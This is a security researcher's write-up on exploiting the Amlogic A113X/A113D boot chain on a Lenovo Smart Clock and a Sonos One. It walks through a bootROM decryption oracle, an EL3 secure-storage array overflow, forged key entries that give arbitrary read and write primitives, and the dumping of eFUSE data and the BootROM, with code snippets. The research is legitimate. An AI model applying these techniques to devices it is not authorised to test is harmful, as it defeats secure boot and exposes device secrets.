Dumping the Amlogic A113X Bootrom
[+] Introduction
While investigating the Sonos One (2nd generation) smart speaker for a potential entry into the Pwn2Own 2022 Toronto competition I got slightly (ahem) sidetracked in a small adventure relating to the bootchain of the AMLogic A113 family of chips.
This work was inspired by Frederic B’s work on AMLogic SoCs. Make sure to check out his awesome blogposts.
To quote the marketing blurb from AMLogic themselves:
With the strong computing capability of quad-core 64-bit CPU architecture, A113X can support the mainstream far-field voice recognition solutions without external DSP chip. A113X can support 8-channel PDM and multi-channel I2S. With flexible microphone array and audio input and output interfaces, A113X is a perfect choice for smart speakers and smart home applications.
The Sonos One (gen2) is based around the A113D SoC. The bootchain is surprisingly well protected. It uses the “secure boot” functionality the SoC offers, meaning all bootloader stages are encrypted and have an RSA signature attached to it. The encryption keys for these bootloaders sit in a eFUSE array that can’t (normally) be read, even by privileged (kernel) code. The U-boot that (nowadays) ships with these devices has been locked down and is protected by a password.
[+] Target board
Like mentioned in the last paragraph, the Sonos One is not a very good board for experimentation with the A113 secure boot chain in general. I looked around for a cheap locally available alternative for experimentation and stumbled accross the Lenovo Smart Clock Essential. It’s a silly little “smart clock” that (at the time) was available for ~50 EUR locally. After (finally) managing to disassemble the device I was eventually able to identify some testpoints for the UART.
Luckily, the Lenovo Clock was a bit less aggressively protected than the Sonos One. For one, the U-boot boot process can be interrupted by sending some bytes over the UART, allowing you to break into a U-boot shell. Secondly, the OTP/eFUSE on the Lenovo Clocks are configured in a way that does not disable the USB boot protocol of the bootROM.
The Lenovo Clock runs a Linux/Android based OS image. After comprehending the U-boot environment variables/scripts a bit I was able to come up with the following basic recipe to boot the thing and drop into a root shell:
setenv adb_setting run set_adb_debuggable
run preboot
run bootcmd
We’re not really interested in any of the Linux stuff, but this provided a
simple way to copy out the /dev/mtd
partitions to a USB mass storage device
(the thing has a USB port) without having to hotair the NAND flash off or dump
the flash over serial through some U-boot trickery.
After dumping the flash I learnt that even though the Lenovo U-Boot isn’t locked down, they do infact make use of the AMLogic provided “secure boot” functionality.
This means all the bootloaders reside encrypted on the flash and their integrity is ensured by means of verifying a RSA signature.
[+] A113X Recon
Finding a datasheet/reference manual for the gritty details of the A113X was surprisingly hard. Typically these are only supplied to vendors who buy their chips for implementation of their products. Luckily, with some sleuthing I was able to find a chinese “document sharing” webpage where it could be obtained.. first I had to farm some credits though by uploading some (unique) documents myself. After uploading a few (publically available) AMLogic datasheets I was able to get the (non publically available) datasheet in return. It happens to have a Xiaomi watermark, thanks anonymous Xiaomi (affiliated) engineer who decided to violate his NDA!
[+] ARM Trusted Firmware TL;DR
Before we move on, let’s have a quick look at a dumbed down overview of the boot path of a platform that follows the reference Arm Trusted Firmware reference implementation (from here on abbreviated as ATF), like the AMLogic A113X does. We’ll ignore things like the SCP (System Control Processor) for now (although it would make an interesting subject for a follow-up post) and focus on the things running on the Application Processor.
As we can see from my poorly drawn diagram, upon reset of the system execution
starts in BL1
, the BootROM. The BootROM will chainload BL2
, which in turn will
load the various BL3
stages. BL31
is the Secure Monitor code running in the
highest privilege level known as EL3
. BL32
is the secure-EL1 payload, on the
target we’re exploring there is no BL32
payload.
The first piece of “untrusted” code that lives outside of the secure world is BL33
.
Typically this is where you will a find bootloader such as U-boot which in turn will
chainload something like Linux.
Our goal for today is to compromise the EL3
secure monitor by running code from
the untrusted (“normal world”) context!
[+] AMLogic USB recovery mode
From various online sources and by reading Frederic’s work I learnt a bit about the general boot flow of AMLogic SoCs. The USB Recovery Mode is especially interesting, as it can be interfaced with from any USB host. There are some opensource efforts of documenting and implementing this USB Recovery Mode protocol, and otherwise there’s some closed source utilities provided by AMLogic themselves.
The BootROM will check two “boot strap” pins (POC1, POC2) to determine in which order it will probe the various methods of booting the system. The following flowchart illustrates this:
The goal of all of the various boot methods is to load the next stage bootloader
into memory and start running it. The next stage bootloader is called BL2
. When
secure boot is enforced (like on the Lenovo and Sonos target boards we have) it
will only let us load correctly encrypted and signed BL2
binaries. Of course we
lack the required encryption keys for encryption and private keys for signing.
By studying pyamlboot and the official aml-flash-tool binaries I was able to learn a bit about the USB protocol that is used for talking to the USB recovery code.
The USB recovery protocol uses regular USB control transfers and supports a
handful of commands. The command opcode is put in bRequest
of the control transfer
packet(s) and things like addresses/offsets are typically sliced into two 16bit
halves and stuffed into the wValue
and wIndex
fields. If those are
foreign/alien words to you and you want to learn more about the nitty gritty
details of the cursed technology that is known as USB.. I kindly refer you
to USB in a nutshell.
Since we don’t have access to the bootROM code, we cannot study the actual implementation. Instead, we’ll rely on publically available tools/code and some good old blackbox testing.
PyAMLBoot gives us the following table of available commands:
REQ_WRITE_MEM = 0x01
REQ_READ_MEM = 0x02
REQ_FILL_MEM = 0x03
REQ_MODIFY_MEM = 0x04
REQ_RUN_IN_ADDR = 0x05
REQ_WRITE_AUX = 0x06
REQ_READ_AUX = 0x07
The *_MEM
operations allow for reading/writing into (restricted ranges) of SRAM.
The REQ_RUN_IN_ADDR
operation starts decryption and verification of the BL2 image
at a specified address. If verification succeeds it will jump into the BL2 entrypoint.
REQ_READ_AUX
and REQ_WRITE_AUX
can be used to peek/poke (restricted ranges) of
memory mapped IO.
[+] Secure Boot Decryption Oracle
When loading a BL2 image over USB what you do is load the BL2 image data to SRAM
in chunks of 64 bytes using the REQ_WRITE_MEM
command. After sending the final
chunk you send a REQ_RUN_IN_ADDR
command with the SRAM base address of the
BL2 image that you just loaded to kick off decryption + validation + execution.
During some blackbox fiddling with this procedure I quickly noticed a funny
oversight in the behavior of REQ_RUN_IN_ADDR
. The decryption of the data placed
in SRAM happens in-place, and when the signature verification fails it does not
bother to clear out the decrypted contents in SRAM. After a failed REQ_RUN_IN_ADDR
command we are still able to follow up with additional commands, and thus we can
use the REQ_READ_MEM
command to read back decrypted contents! Essentially,
this gives us a decryption oracle for BL2 images and any other data that is
encrypted with the same algorithm/key.
Some more blackbox poking of this interface revealed the encryption is a block cipher with a block size of 16 bytes and it exhibits properties of a block cipher used in CBC mode.
Using this little trick, I corrupted some trailing bytes of a known-valid BL2 image I got from my NAND dump (which resides at the very start of mtd0) to make signature verification fail, and was able to dump the decrypted BL2 code/data for further static analysis.
[+] Reversing BL2
BL2
is responsible for loading BL31
and BL33
. BL31
runs in the highest privilege
context in secure world known as EL3
. BL33
runs in the normal world, and typically
consists of a bootloader like U-boot, which in turn will chainload something like
Linux.
If we look at the UART log output from BL2
we can see:
Load FIP HDR from NAND, src: 0x0000c000, des: 0x01700000, size: 0x00004000, part: 0
Load BL3x from NAND, src: 0x00010000, des: 0x01704000, size: 0x000b0e00, part: 0
NOTICE: BL31: v1.3(release):d3a620ec3
NOTICE: BL31: Built : 10:32:40, Jan 20 2021
NOTICE: BL31: AXG secure boot!
NOTICE: BL31: BL33 decompress pass
The ‘FIP HDR’ is a table containing offsets/sizes for the various BL3x
blobs.
Each entry in this table has size 0x28
with a maximum of 32 entries. The layout
of an entry is:
uint8_t uuid[0x10]
uint64_t offset
uint64_t size
uint64_t flags
Using the decryption oracle we used to decrypt BL2
we can also decrypt the FIP
table + all BL3x
data. Next, we can parse the FIP
and extract the individual
chunks using a simple script:
#!/usr/bin/env/python
import sys
import struct
import binascii
FIP_ENTRY_COUNT_MAX = 32
FIP_ENTRY_SIZE = 0x28
if __name__ == "__main__":
if len(sys.argv) != 3:
print("usage: %s <input.bin> <outputdir>" % sys.argv[0])
exit(0)
input_filename, output_dir = sys.argv[1:]
d = open(input_filename, "rb").read()[0x10:]
fip_hdr = struct.unpack("<LLQ", d[0:0x10])
assert(fip_hdr[0] == 0xaa640001)
assert(fip_hdr[1] == 0x12345678)
for i in range(FIP_ENTRY_COUNT_MAX):
offs = 0x10 + (i * FIP_ENTRY_SIZE)
entry = d[offs:offs+FIP_ENTRY_SIZE]
offs, size, flags = struct.unpack("<QQQ", entry[0x10:])
uuid = entry[0:0x10]
if uuid == b"\x00"*16: break
uuid_str = binascii.hexlify(uuid).decode()
print("entry #%02d: %s - offs: %08x, size: %08x, flags: %x" % (
i, uuid_str, offs, size, flags
))
if size == 0: continue
output_filename = "%s/%02d_%08x_%s" % (
output_dir, i, offs, uuid_str
)
with open(output_filename, "wb") as fh:
fh.write(d[offs:offs+size])
$ python3 fip.py mtd1.out fip_out
#00: 9766fd3d89bee849ae5d78a140608213 - offs: 00004000, size: 0000d800
#01: 47d4086d4cfe98469b952950cbbd5a00 - offs: 00011800, size: 00031600
#02: 05d0e18953dc13478d2b500a4b7a3e38 - offs: 00042e00, size: 00000000
#03: d6d0eea7fcead54b97829934f234b6e4 - offs: 00042e00, size: 00072000
#04: f41d1486cb95e6118488842b2b01ca38 - offs: 00000188, size: 00000468
#05: 4856ccc2cc85e611a5363c970e97a0ee - offs: 000005f0, size: 00000468
Examining the extracted chunks we observe that:
UUID 9766fd3d89bee849ae5d78a140608213 = BL30
UUID 47d4086d4cfe98469b952950cbbd5a00 = BL31
UUID 05d0e18953dc13478d2b500a4b7a3e38 = empty (unused BL32 slot)
UUID d6d0eea7fcead54b97829934f234b6e4 = BL33
UUID f41d1486cb95e6118488842b2b01ca38 = metadata
UUID 4856ccc2cc85e611a5363c970e97a0ee = metadata
Great! We now have the plaintext blobs for BL31
(the EL3 secure monitor) and BL33
(U-boot)!
[+] Reversing BL31
Our goal is to dump the BootROM and eFUSE/OTP data. So we’ll need to find a way
to get code running in the context of the EL3 secure monitor (BL31
). I started
studying the open source ATF reference implementation.
The documentation on ‘Arm SiP Services’ mentions:
SiP services are non-standard, platform-specific services offered by the silicon implementer or platform provider. They are accessed via SMC (“SMC calls”) instruction executed from Exception Levels below EL3.
This sounds like a great spot to start hunting for bugs. It involves vendor
specific code that deviates from the open source reference implementation, and it
can be reached from the “normal world” by invoking SMC
(Secure Monitor Call) instructions.
By reading the ATF code we learn that SMC calls are divided up into “services”,
of which SiP is one. These services are registered from a table of rt_svc_desc
entries.
These service descriptors contain (amongst other things) a name for the service
and two function pointers, one for initialization (init
) and another one for
handling the actual secure monitor calls (handle
). The SiP service is conveniently
called sip_svc
, so by following some references to this string constant I was quickly
able to find the SiP SMC routine dispatcher.
I expected to maybe identify a handful of vendor specific SMC functions, but to my
surprise there was a total of 115 of them. The handle
function contains a big switch
case for the various vendor specific SMC ID’s and dispatches their functionality by
looking up a function pointer in a big table that I call platform_ops
. The platform_ops
pointer is initialized by the SiP service init
function and resides in the .data
section
of the EL3 code.
115 routines (not to mention all the subroutines they call into) is quite a bit of
tedious reversing work. Luckily, a lot of it is boilerplate stuff like routines that
simply return a pointer for where the shared memory buffers reside, and such. Quite a few
entries in the platform_ops
table were also NULL pointers, making the SiP SMC dispatcher
bail if you tried to invoke any of these. After culling through it a bit we’re left
with routines pertaining to (surprise) cryptographic operations, limited access to OTP/eFUSE
data and a whole cluster of routines related to some “secure storage” facility.
[+] Secure Storage
The “secure storage” functionality facilitates a way of having key/value pairs encrypted with an AES key that is never visible to the normal world.
Linux (or any other OS running in EL2) can query the secure storage, and read/write items to/from this storage using these vendor specific SMC calls.
Reversing the storage related routines reveals the following core functions that can be invoked through the SMC interface:
SMC 0x82000069
- SIP_CMD_STORAGE_PARSE
:
- This routine is used to parse an (encrypted) secure storage blob, it is invoked before you can actually read or write items from the storage.
SMC 0x82000061
- SIP_CMD_STORAGE_READ
:
- This routine is used to read an item from the secure storage. The name of the item is included in the request body.
SMC 0x82000062
- SIP_CMD_STORAGE_WRITE
:
- This routine is used to write/update an item in the secure storage.
SMC 0x82000068
- SIP_CMD_STORAGE_REMOVE
:
- This routine is used to remove an item from the secure storage.
SMC 0x82000067
- SIP_CMD_STORAGE_LIST
:
- This routine is used to get a list of all items (names) in the secure storage.
To start using this secure storage we SIP_CMD_STORAGE_PARSE
, which accepts a
single argument that contains the size of the encrypted storage blob. The actual
encrypted storage blob to be parsed is written to a shared memory buffer residing
in DRAM. The address of this shared buffer is fixed and can be retrieved using
SMC 0x82000025
, this address is 0x5080000
.
The maximum size accepted by the SIP_CMD_STORAGE_PARSE
handler is 0x40000
bytes.
The storage starts with a plaintext header of size 0x200
that looks like this:
struct {
uint8_t magic[0x10];
uint32_t key_version;
uint32_t seed_mode;
uint8_t body_hash[0x20];
uint8_t padding[];
}
Following the header we fill find the encrypted body containing the storage items.
If the key_version
field contains a value greater than 0
it will compute a SHA256
digest over the encrypted body and compare it to the value in body_hash
. If it doesn’t
match, it will bail from the remainder of the parsing logic.
Next, the parsing routine will initially only decrypt the first 0x200
bytes of the
encrypted body using AES-256 in CBC mode. We will call this first 0x200
sized block
the param
block. Depending on the value of seed_mode
it will construct the AES key
and IV being used in the following way:
seed_mode
= 1:
- error, invalid
seed_mode
= 2:
- AES key = a hardcoded value from the
.data
section of the EL3 code - AES IV = all zeroes
seed_mode
= anything else:
- AES key = 12 byte
CPUID
from the eFUSE/OTP concatenated with a fixed 20 byte value from the.data
section - AES IV = 12 byte
CPUID
from the eFUSE/OTP concatenated with a fixed 4 byte value from the.data
section
This is great, even without any knowledge of the CPUID
value (though its easy to recover/grab) we can now
encrypt our own arbitrarily constructed “secure storage” blobs and feed them to the parser!
The param
block contains a list of (nested) TLV (Type-Length-Value) entries
which are used to describe some properties of the remaining body data. Every TLV
entry is structured as a 32bit type
, followed by a 32bit size
, followed by size
bytes of data.
The outer TLV is one of type 0x1 TYPE_PARAM_HEADER
, the inner body is a single
TLV with type 0x2 TYPE_ENCRYPTED_SIZE
specifying the size of the rest of the body.
Following the param
block we have the actual key
entries which are also
encoded as a list of nested TLVs.
A key entry always starts with a TLV of type TYPE_KEY_DEFINITION
(0x3). The body of this TLV
contains multiple TLVs describing the properties of this key entry. Possible type
values for a KEY_DEFINITION
are:
Type | Name | Description |
---|---|---|
0x4 | NAME_SIZE |
the length of the name |
0x5 | NAME_DATA |
the actual name |
0x6 | VALUE_SIZE |
the length of the value |
0x7 | VALUE_DATA |
the actual value |
0x8 | KEY_TYPE |
a 32bit value indicating the “type” of value |
0x9 | BUFFER_STATUS |
a 32bit value indicating whether the value is “dirty” |
0xa | HASH_DATA |
a 0x20 byte SHA256 digest over the value data. |
The KEY_DEFINITION
entries that are correctly formed get stored internally in an
array of key_entry
entries that resides in the EL3 .bss
, with a maximum 64 entries.
The structure of a key_entry
looks like this:
// sizeof(key_entry) == 0x90
struct key_entry {
uint8_t name[80];
uint32_t name_len;
uint32_t buffer_status;
uint32_t key_type;
uint32_t value_size;
uint8_t *value_ptr;
uint8_t hash[0x20];
uint32_t key_in_use;
uint32_t unknown;
}
the key_in_use
value specifies whether a key entry is valid or not, and gets
set after comparing the SHA256 digest of the value
against the hash
.
[+] Pwning BL31
The loop in the parser code for filling this array of key_entry
values looks
roughly like this:
uint32_t key_entry_size_out;
g_keys_count = 0;
while (encrypted_size) {
key_out = &g_keys[g_keys_count];
if (parse_key(keyheap_ptr, key_out, &key_entry_size_out)) {
goto ERROR_BAIL;
}
sha256(key_out->value_ptr, key_out->value_size, value_hash);
key_hash = key_out->key_hash;
if (!memcmp(key_hash, value_hash, 32)) {
key_out->key_in_use = 1;
++g_keys_count;
} else {
key_out->key_in_use = 1;
}
keyheap_ptr = keyheap_ptr + key_entry_size_out;
encrypted_size -= key_entry_size_out;
}
One obvious issue that immediately stands out is that there is no upper limit
on g_keys_count
being enforced leading to an overflow of g_keys
, which is
the array of key_entry
structs. Looks like a promising bug!
Initially I tried to get code execution by using this overflow to overwrite the
pointer to platform_ops
at the end of .data
. But doing this required about..
~3740 key_entry
objects, destroying a lot of pointers/data along the way with
uncontrolled data due to unfortunate alignment of certain key_entry
struct members.
I studied the memory layout a bit more carefully:
0000: uint32_t g_keys_count;
0004: key_entry g_keys[64];
2404: uint64_t g_key_version;
240c: uint8_t param_sector_decrypted[0x200];
There was a scratch buffer for the decrypted param
block neighboring the keys
array. So if we add more than 64 entries to our storage blob that is being parsed
we can overwrite this scratch buffer .. that is not actually used anymore at that
point. So how is this useful? The key_entry
objects it will write there will
be sane enough that it doesn’t really gain us anything.
If we look at the implementation of SIP_CMD_STORAGE_READ
and SIP_CMD_STORAGE_WRITE
we notice they both look up the corresponding key_entry
by a given name. The
function that does this looks like this:
int key_find_by_name(void *key_name, unsigned int match_len)
{
int key_index;
key_entry *current_key;
key_index = 0;
while (1) {
if (key_index > g_keys_count) {
return 0xFFFFFFFFLL;
}
current_key = &g_keys[key_index];
if ( (current_key->key_in_use & 1) != 0
&& current_key->name_len == match_len
&& !(unsigned int)memcmp(&g_keys[key_index], key_name, match_len)) {
break;
}
++key_index;
}
return key_index;
}
This routine has a tiny but interesting quirk: rather than assuming the maximum
index into the g_keys
is min(g_keys_count, 64)
it assumes g_keys_count
is
always within bounds of the maximum capacity of g_keys
.
Let’s study (majorly trimmed down version of) the parsing function a bit more:
int parse_storage() {
g_seed_mode = -1;
g_key_version = -1;
int param_parsed[2];
if (strcmp(header.magic, "AMLSECURITY")) {
goto ERROR_BAIL;
}
g_seed_mode = header.seed_mode;
g_key_version = header.key_version;
decrypt(param_sector_encrypted, param_sector_decrypted, 0x200);
if (!parse_param_sector(param_sector_decrypted, param_parsed)) {}
reset_key_heap();
memset(g_keys, 0, sizeof(key_entry) * 64);
return 0;
}
g_keys_count = 0;
decrypt(storage_body_enc, storage_body_dec, storage_body_size);
while(encrypted_size) {
// .. key parsing logic
}
}
If we invoke SIP_CMD_STORAGE_PARSE
a second time we can control what ends up in the
param_sector_decrypted
scratch buffer. Effectively this lets us forge arbitrary
key_entry
objects. The problem is.. invoking SIP_CMD_STORAGE_PARSE
a second time
will reset g_keys_count
to be 0.. unless we make parse_param_sector
fail; then
all it will do is wipe g_keys
(but only for its original maximum capacity of 64 entries),
and leave g_keys_count
alone! This means that keys with indices of 64 and higher
will overlap with the param_sector_decrypted
buffer.
Lets examine the logic of parse_param_sector
:
typedef struct {
uint32_t encrypted_size;
uint32_t type_11_val;
} param_block_t;
int parse_param_sector(uint8_t *param_sector_buf, param_block_t *out) {
int result;
int remaining;
tlv_t *tlv_root = (tlv_t*)param_sector_buf;
uint8_t *p = (param_sector_buf + 8);
remaining = tlv_root->size;
result = 0xFFFFFFFF;
if ( tlv_root->type == 1 ) {
while (remaining) {
tlv_t *tlv_next = (tlv_t*)p;
remaining -= (tlv_next->size + 8);
if (tlv_next->type == 2) {
out->encrypted_size = *(uint32_t*)(p + 8);
} else if (tlv_next->type == 11 ) {
out->type_11_val = *(uint32_t*)(p + 8);
}
p += (tlv_next->size + 8);
}
return 0;
}
return result;
}
As we can see it parses a nested TLV structure that needs to start with a TLV that
has type 0x1
(I call this TYPE_PARAM_BLOCK_START
). if it does not.. it will
return an error code. Simple!
The first key index that (partially) overlaps with param_sector_decrypted
is 64,
but the initial 8 bytes are occupied by the value of g_key_version
, which is is
overwritten when we trigger storage parsing the second time. While still usable,
for convenience sake lets put the forged key_entry
we care about into the next
slot (index 65) since it fully overlaps with controlled data from param_sector_decrypted
.
Our forged key_entry
will look like this:
Offset | Field | Value |
---|---|---|
0x00 | name | “XXXX” |
0x50 | name_len | 4 |
0x54 | buffer_status | 0 |
0x58 | key_type | 0 |
0x5c | value_size | 8 |
0x60 | value_ptr | ANY_POINTER_WE_LIKE |
0x68 | hash | 0x00 * 32 |
0x88 | key_in_use | 1 |
0x8c | unknown | 0 |
Now, if we trigger a SIP_CMD_STORAGE_READ
operation requesting to read the value
of the storage item with name XXXX
it will traverse the g_keys
array until it
reaches our forged key_entry
object and will copy key_entry.value_size
(8) bytes
from key_entry.value_ptr
to the output buffer in shared memory, from where we
can retrieve it. This gives us an arbitrary read64
primitive!
We can use exactly the same approach, but instead with SIP_CMD_STORAGE_WRITE
to
get an arbitrary write64
primitive.
Using our write64
primitive we can finally overwrite the pointer to platform_ops
to hijack the function pointer table of the SiP SMC dispatcher.
[+] Dumping the eFUSE/OTP data
So we have some control flow hijacking in the secure monitor. What’s next? Let’s try to dump the eFUSE/OTP data somehow.
Let us start by slightly upgrading our set of primitives. the SiP SMC dispatcher will
invoke the correct function pointer from the platform_ops
table depending on the
SMC ID and call this function with the right amount of arguments that were originally
passed to the SMC. I noticed SMC 0x820000FF
will pass the original SMC arguments (X1, X2, X3, X4)
into the handler for SMC 0x820000FF
as-is (X0, X1, X2, X3).
So hijacking this entry in the platform_ops
table while leaving the rest untouched
will give us an arbitrary call4
(function call with up to 4 controlled arguments)
primitive when invoking SMC 0x820000FF
.
During reversing I already identified the EL3 code that reads data from the OTP. This
works by sending a SCPI message (command 0x8000C2
to be precise) to the SCP
(System Control Processor) using some mailbox MMIO interface. We don’t have to
reimplement this of course, we just call4
the convenience function that does this for us.
The prototype for this function is:
int aml_scpi_cmd_efuse_read(void *out, uint32_t offset, uint32_t size);
so, in order to dump the eFUSE/OTP data using our EL3 SMC exploit, we can just:
call4(aml_scpi_cmd_efuse_read, SOME_DRAM_ADDRESS, 0, 0x100)
And afterwards we just read it back from DRAM from the “normal world”. :-)
[+] Dumping the BootROM
We’re almost done, but a copy of the application processor’s BootROM would be nice
to have now we’re able to run code in this privileged context. From the (leaked)
A113X datasheet we can learn that the physical address of the BootROM is 0xffff0000
.
However, we can’t simply read it from EL3 because BL31 configured the MMU and there is no VA -> PA 0xffff0000 mapping we can read from. Let’s learn a bit about MMU setup and the page tables.
The intricate details of the Aarch64 memory model are quite involved, we’re only going to try and understand the bare minimum amount of details needed to patch up the existing configuration/page tables so we can dump the ROM. ;-)
In EL3 the level 1 page table address is configured by writing to the special
register TTBR0_EL3
(the Translation Table Base Register 0 for EL3) using the
MSR
instruction. Another important special register is TCR_EL3
(the Translation Control Register for EL3),
which configures things like the page granule and size of the address space.
If we follow the ATF code (and BL31 disassembly) we will find the routine enable_mmu_el3
which contains the following writes to these special registers:
TCR_EL3 = 0x80803520
TTBR0_EL3 = base_xlation_table
0x80803520 corresponds to the following settings for TCR_EL3:
Bits | Field | Value |
---|---|---|
0:5 | T0SZ | 0x20 |
6:7 | IRGN0 | 1 |
8:9 | ORGN0 | 1 |
12:13 | SH0 | 3 |
14:15 | TG0 | 0 = 4KiB page granule |
16:18 | PS | 0 |
20 | TBI | 0 = Top Byte used in the address calculation. |
The size of the address space can be calculated by doing 64 - T0SZ
. So in this
case we have a 32bit address space. With a 4KiB granule and a 32bit address space
there is no level 0 page table, we start at level 1. The level 1 page table index
bits are bits 30 up till (and including) bit 38. For a 32bit address this means
it will only be indexed with bit 30 and 31 giving us a level 1 page table size of
exactly 4 entries. Each entry spans 1GiB (0x40000000).
if we dump the level-1 page table by reading 32 bytes bytes from the address written
to TTBR0_EL3
, we see:
0x00000000051c6003
0x0000000000000000
0x0000000000000000
0x00000000051c9003
the lower 2 bits of the entries in the table describe the type of address they point to. Any entry which does not have bit0 set is considered invalid. The first and last entry have a value of 0x3 for the lower 2 bits, which means they are addressess pointing to a the next level’s table address.
Level-2 page tables are indexed using bits 21:29 (9 bits) of the virtual address.
Since we’re interested in the address 0xffff0000
we can calculate the index
into the table by taking bits 21:29 which is 0x1ff. every entry in the level-2
table spans a region of 2MiB, so entry 0x1ff covers ffe00000-ffffffff
.
at 0x51c9000 + (0x1ff * 8)
we find the value 0x51cd003
which is the address
of the level-3 pagetable. At the level-3 pagetable no more indirection is allowed.
Every 64bit value in a level3 table describes the mapping of a 4KiB page.
A level3 descriptor value is structured like this:
Bits | Field | notes |
---|---|---|
52:63 | UPAT | Upper Page Attributes |
40:51 | RES0 | Should be zeroed |
12:39 | ADDR | Address bits 12-39 |
2:11 | LPAT | Lower Page Attributes |
0:1 | reserved | always 0x3 (0b11) |
the upper page attributes consist out of 3 single-bit properties (ignoring any
reserved bits): the contiguous hint
bit (52), the PXN
bit (53) and the XN
bit (54).
We don’t really care about enforcing XN
(eXecute Never) or PXN
(Privileged eXecute Never),
and we don’t have to set the contiguous hint
bit either for the page table entries
we’re about to introduce, so our UPAT
value is zero.
The lower page attributes (10bits) are a bit more involved and are structured like this:
The attrindex
bit 0 needs to match the correct index for the MAIRn (Memory Attribute Indirection Registers) register that has been configured. In enable_mmu_el3
they configure MAIR1
, so we use the an attrindex value of 0b001
.
The ns
bit is the Non-Secure bit, since we’ll be dumping the ROM using our privileged
read64
primitive we can simply leave this set to 0.
The two ap
field in the entry maps to the page access permissions as per the AP[2:1]
access permission model. Again,
since we’re only going to access this region with our privileged read64
primitive, it is safe
to set these bits to 0, making the entry R/W for our privilege level.
The sh
field is used to specify the “shareability” attributes of this page. we’ll specify a value of 0b10
here (Outer Shareable), so any processor, core and peripheral can access this. (Although that isn’t strictly nescessary of course)
The af
bit we’ll set to 1 for reasons I never bothered to fully comprehend. Finally, the nG
(not-Global) bit indicates if an entry is global or not, we’ll
leave this bit cleared to mark it as global.
We end up with a LPAT value of 0x181
.
Putting it all together, we can construct our page table entries by doing:
(addr & 0xfffff000) | (0x181 << 2) | 3
We don’t exactly know (yet) how big the BootROM is, but we can start by mapping
64KiB worth of pages starting at 0xffff0000
and see how far that gets us. To
calculate the index into the L3 page table we’re patching we can simply
do (addr - 0xffe00000) / 0x1000
, and of course multiply this index by 8 if we
want the byte offset (remember every pagetable entry is 64bits).
Let’s summarize in a simple to follow python snippet:
#!/usr/bin/env python
LPAT = 0x181
UPAT = 0
tbl_start = 0xffe00000
map_start = 0xffff0000
map_end = map_start + (1024 * 64)
for addr in range(map_start, map_end, 0x1000):
index = (addr - tbl_start) // 0x1000
entry = (addr & 0xfffff000) | (UPAT << 52) | (LPAT << 2) | 3
print("write64(L3_TABLE + 0x%04x, 0x%016x)" % (index * 8, entry))
This will give us a list of 64bit writes we need in order to map (1:1, identity-mapped, VA=PA)
the BootROM region. Afterwards, we simply use our read64
primitive to dump the entire
64KiB region to a file. Of course we could have easily upgraded the read64
primitive to
something that allows us to read data faster, so it takes a minute or so to dump the
full 64KiB for us.. but who would mind a little suspense after all this work? ;-)
After examining the result data we got we can quickly notice some repeating strings
and we can conclude the image loops after 0x8000
bytes. So the actual size of the
ROM is 32KiB
.
$ sha256sum a113x_bootrom.bin
7d1f63f6ddec05f538243aaa532c0503517de8ce9d2033d2b36b6c79695be626 a113x_bootrom.bin
[+] Closing Words & What’s next?
You made it this far!
I started writing this post back in December.. but documenting stuff for the public is always much less exciting than working on new stuff, bla bla bla.
Anyway, I hope you enjoyed the read! Feel free to reach out to point out any inconsistencies. The EL3 exploit described in this post applies to both the Lenovo Smart Clock (AMLogic A113X SoC) as well as the Sonos One gen2 (AMLogic A113D SoC). The exploit was initially prototyped on the Lenovo clock from an U-boot context and was later ported to the Sonos One to a Linux userland context (assisted by a custom kernel module). All of this code can be found on Github.
It would be great if some exploit could be found in the a113x/d bootrom. I did some cursory RE work to quickly check if the amlogic-usbdl bug is also present in the a113x bootrom, but it looks like that is not the case. (feel free to double check, of course :-))
Even if such a bug was present it would be useless for permanently jailbreaking the Sonos One gen2 though, since they blow the eFUSE which disabled the USB recovery stuff in the BootROM all together. :-(
There will be a follow up post describing some Sonos specific stuff like their flash encryption and OTA update encryption, stay tuned!